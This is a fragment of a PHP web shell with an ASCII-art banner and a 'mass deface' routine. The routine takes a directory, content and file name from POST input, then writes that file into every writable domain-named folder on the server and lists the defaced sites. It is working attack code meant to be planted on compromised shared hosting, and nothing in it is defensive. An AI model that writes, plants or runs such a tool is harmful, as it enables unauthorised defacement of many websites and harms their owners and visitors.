';
echo "\n";
echo " ██████ █████ ████████ ███████ ██████ ███████ ██████ █████ ███ ███ ██████ ██████ ██████ ██████ ██ ██ ██████ ██████ \n";
echo "██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ \n";
echo "██ ███████ ██ █████ ██████ ███████ ██ ███████ ██ ████ ██ ██ ██ ██ ██████ ██████ ██ ██ █████ ██ ██ ██ \n";
echo "██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ \n";
echo " ██████ ██ ██ ██ ███████ ██ ██ ███████ ██████ ██ ██ ██ ██ ██████ ██████ ██ ██ ██ ████ ██████ ██ ██████ \n";
echo '
';
// Display system information
echo "';
echo "";
// Handle Mass Deface Submission
if (isset($_POST['mass_deface_submit'])) {
$defacePath = realpath($_POST['mass_deface_path']);
$defaceContent = $_POST['deface_content'];
$defaceFilename = $_POST['deface_filename'];
// Check if directory is valid and readable
if (is_dir($defacePath) && is_readable($defacePath)) {
$domains = []; // Store the affected domains
$entries = scandir($defacePath);
foreach ($entries as $entry) {
$entryPath = $defacePath . '/' . $entry;
// Only target directories that look like domain names
if (is_dir($entryPath) && preg_match('/\.[a-z]{2,}$/i', $entry)) {
$targetFile = $entryPath . '/' . $defaceFilename; // Custom file name
// Ensure the file is writable or can be created
if (!file_exists($targetFile) || is_writable($targetFile)) {
file_put_contents($targetFile, $defaceContent);
$domains[] = $entry . '/' . $defaceFilename; // Add domain to affected list
}
}
}
// Display success message with affected domains
if (!empty($domains)) {
echo "